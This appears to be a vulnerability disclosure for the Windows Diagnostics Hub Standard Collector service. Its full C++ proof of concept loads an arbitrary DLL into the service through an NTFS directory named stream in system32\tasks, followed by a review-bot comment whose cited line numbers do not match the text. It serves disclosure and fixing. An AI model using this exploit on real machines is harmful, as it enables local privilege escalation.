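+CVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is theres an assumption that its not possible to write a file to the system32 directory, which technically is true but practically for this exploit false.
+As Ive blogged about before, and also submitted bugs (for example MSRC-21233) a normal user can created named streams on directories as long as they have FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\tasks folder is writable by a normal user, so you can copy a DLL to system32\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When the GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds and the service will proceed to load the file.
+On the fixing side of things, I cant see an obvious reason why just checking for invalid path characters in the agent path wouldnt be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think its slightly dodgy that youll load any DLL from system32, even ones which arent agent DLLs. Youd have to find something which was somehow exploitable in a very short time window during DllMain but it might work.
+Also I wonder whether theyre any legitimate uses for named streams on NTFS directories? While its certainly out of scope perhaps they could only be created by admins? Or perhaps the access check shouldnt be on the target directories but its parent directory where the effective file appears to be located.
+Proof of Concept:
+Ive provided a PoC as a C++ source code file. Youll also need a DLL to test load, Ive not provided one of these but any should do, as long as it matches the bitness of the OS.
+1) Compile the C++ source code file.
+2) Execute the poc passing the path to the DLL you want to load in the service as a normal user.
+3) It should print that the DLL was loaded successfully.
+Expected Result:
+The loading of a DLL fails as the path is rejected.
+Observed Result:
+The DLL is loaded successfully.
+*/
+// ExploitCollector.cpp : Defines the entry point for the console application.
+//
+#include <stdio.h>
+#include <tchar.h>
+#include <Windows.h>
+#include <comdef.h>
+#include <strsafe.h>
+GUID CLSID_CollectorService =
+{ 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };
+class __declspec(uuid("f23721ef-7205-4319-83a0-60078d3ca922")) ICollectionSession : public IUnknown {
+public:
+virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;
+virtual HRESULT __stdcall PostBytesToListener() = 0;
+virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;
+//.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *)
+//.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *)
+//.rdata:0000000180035878 dq offset ? Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void)
+//.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void)
+//.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *)
+//.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *)
+//.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *)
+//.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *)
+//.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *)
+//.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *)
+//.rdata:00000001800358B8 dq offset ? SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic
+};
+struct SessionConfiguration
+{
+DWORD version; // Needs to be 1
+DWORD a1; // Unknown
+DWORD something; // Also unknown
+DWORD monitor_pid;
+GUID guid;
+BSTR path; // Path to a valid directory
+CHAR trailing[256];
+};
+class __declspec(uuid("7e912832-d5e1-4105-8ce1-9aadd30a3809")) IStandardCollectorClientDelegate : public IUnknown
+{
+};
+class __declspec(uuid("0d8af6b7-efd5-4f6d-a834-314740ab8caa")) IStandardCollectorService : public IUnknown
+{
+public:
+virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;
+virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;
+virtual HRESULT __stdcall DestroySession(REFGUID) = 0;
+virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;
+virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;
+};
+_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));
+_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));
+class CoInit
+{
+public:
+CoInit() {
+CoInitialize(nullptr);
+}
+~CoInit() {
+CoUninitialize();
+}
+};
+void ThrowOnError(HRESULT hr)
+{
+if (hr != 0)
+{
+throw _com_error(hr);
+}
+}
+int wmain(int argc, wchar_t** argv)
+{
+if (argc < 2)
+{
+printf("poc path\\to\\dll\n");
+return 1;
+}
+CoInit coinit;
+try
+{
+GUID name;
+CoCreateGuid(&name);
+LPOLESTR name_str;
+StringFromIID(name, &name_str);
+WCHAR random_name[MAX_PATH];
+StringCchPrintf(random_name, MAX_PATH, L"tasks:%ls.dll", name_str);
+WCHAR target[MAX_PATH];
+GetSystemDirectory(target, MAX_PATH);
+StringCchCat(target, MAX_PATH, L"\\");
+StringCchCat(target, MAX_PATH, random_name);
+WCHAR valid_dir[MAX_PATH];
+GetModuleFileName(nullptr, valid_dir, MAX_PATH);
+WCHAR* p = wcsrchr(valid_dir, L'\\');
+*p = 0;
+StringCchCat(valid_dir, MAX_PATH, L"\\etw");
+CreateDirectory(valid_dir, nullptr);
+if (!CopyFile(argv[1], target, FALSE))
+{
+printf("Error copying file %d\n", GetLastError());
+return 1;
+}
+IStandardCollectorServicePtr service;
+ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));
+DWORD authn_svc;
+DWORD authz_svc;
+LPOLESTR principal_name;
+DWORD authn_level;
+DWORD imp_level;
+RPC_AUTH_IDENTITY_HANDLE identity;
+DWORD capabilities;
+ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));
+ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));
+SessionConfiguration config = {};
+config.version = 1;
+config.monitor_pid = ::GetCurrentProcessId();
+CoCreateGuid(&config.guid);
+bstr_t path = valid_dir;
+config.path = path;
+ICollectionSessionPtr session;
+ThrowOnError(service->CreateSession(&config, nullptr, &session));
+GUID agent_guid;
+CoCreateGuid(&agent_guid);
+ThrowOnError(session->AddAgent(random_name, agent_guid));
+}
+catch (const _com_error& error)
+{
+if (error.Error() == 0x8007045A)
+{
+printf("DLL should have been loaded\n");
+}
+else
+{
+printf("%ls\n", error.ErrorMessage());
+printf("%08X\n", error.Error());
+}
+}
+return 0;
+}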
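Review bot: The success check at line 2082 compares against the bare literal `0x8007045A`, which is `HRESULT_FROM_WIN32(ERROR_DLL_INIT_FAILED)` (1114): the service mapped the DLL and its DllMain ran and returned FALSE, which is why that error is the proof of a load — write it as `if (error.Error() == HRESULT_FROM_WIN32(ERROR_DLL_INIT_FAILED)) // DllMain ran inside the service: the DLL was loaded` so the reader does not have to decode it, and note that a test DLL whose DllMain returns TRUE will presumably not reach this branch. The PoC also leaves artefacts behind: the DLL copied to `%SystemRoot%\System32\tasks:<guid>.dll` at line 2052 and the `etw` directory created at 2051 are never removed, and `name_str` from `StringFromIID` (line 2039) is never released with `CoTaskMemFree`; a `DeleteFile(target)` after the `AddAgent` call (deleting the stream path removes only that stream, not the tasks directory) plus `RemoveDirectory(valid_dir)` would keep test hosts clean. The return values of `CoInitialize`, `GetSystemDirectory` and the two `StringCchCat` calls (lines 2013, 2043-2045) are unchecked, so a failure there would silently produce a wrong target path before the copy rather than an error.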